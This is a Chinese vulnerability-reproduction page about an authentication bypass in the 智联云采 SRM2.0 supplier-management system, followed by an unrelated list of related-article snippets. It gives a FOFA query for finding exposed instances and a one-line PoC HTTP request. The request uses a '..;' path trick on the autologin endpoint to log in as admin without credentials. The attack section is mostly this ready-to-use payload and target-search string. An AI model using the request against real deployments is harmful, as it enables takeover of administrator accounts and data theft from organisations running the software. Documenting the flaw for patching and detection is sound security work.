智联云采 SRM2.0 autologin 身份认证绕过漏洞复现

embedded/2024/11/8 19:07:56/

0x01 产品简介

智联云采是一款针对企业供应链管理难题及智能化转型升级需求而设计的解决方案,针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。

0x02 漏洞概述

由于智联云采 SRM2.0 autologin 接口代码逻辑存在缺陷,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台,造成信息泄露,使系统处于极不安全的状态。

0x03 复现环境

FOFA:title=="SRM 2.0"

0x04 漏洞复现

PoC

GET /adpweb/static/..;/api/sys/app/autologin?loginName=admin HTTP/1.1
Host: 


http://www.ppmy.cn/embedded/107135.html

相关文章

Express与SQLite集成教程:轻松实现数据库操作

Express使用SQLite的教程可以大致分为以下几个步骤。以下是一个详细的指南,帮助你在Express项目中集成SQLite数据库。 1. 安装必要的库 首先,你需要在你的Express项目中安装sqlite3库。打开终端或命令提示符,切换到你的项目目录&#xff0c…

后端开发刷题 | 数组中的逆序对

描述 在数组中的两个数字,如果前面一个数字大于后面的数字,则这两个数字组成一个逆序对。输入一个数组,求出这个数组中的逆序对的总数P。并将P对1000000007取模的结果输出。 即输出P mod 1000000007 数据范围: 对于 50%50% 的数据, size≤1…

缓存分布式一致性问题

缓存一致性问题发生的原因,是在更新数据时数据库和缓存数据的不一致。我们要做到保证缓存的最终一致性。如果数据需要强一致性建议直接查询数据库。 双写模式 双写模式为先写数据库,在写缓存。 进来两个请求,先执行“请求1”的操作写入数据…

WireShark网络分析~部署方式

一、《Wireshark网络分析就这么简单》 第一章学习 声明:文章只限于网络学习和实验,请遵守《网络安全法》。 第一章问题一:两台服务器A和B的网络配置如下(见图1),B的子网掩码本应该是255.255.255.0,被不小心配成了255.…

Mysql的事务

Mysql的事务_sql中开启事物的命令是transaction-CSDN博客

OceanBase性能相关

**OceanBase 关于SQL监控与执行计划记录**记录来源:(OceanBase)DBA 从入门到实践 一、慢SQL与性能视图 慢SQL参数说明: V3.2.3前 trace_log_slow_query_watermark 默认是 100ms。 V3.2.3及后续 trace_log_slow_query_watermark 默认是 1s。慢SQL性能查看…

支付宝异地收款码之手机号(邮箱)跳转二维码

这个方法只需要支付宝的邮箱或者手机号就可以制作,简单方便,以下是步骤: 1、需要注册支付宝的手机号或者邮箱 2、构建转账请求,使用支付宝提供的API接口,如alipay.fund.trans.uni.transfer等构建转账请求 3、发送步…

MySQL数据类型-介绍

MySQL 支持多种数据类型,这些数据类型可以根据它们所存储的数据类型大致分为几类:数值类型、日期和时间类型、字符串(字符)类型、空间数据类型以及JSON数据类型。 一、数据类型 1.整数类型 TINYINT:非常小的整数。例…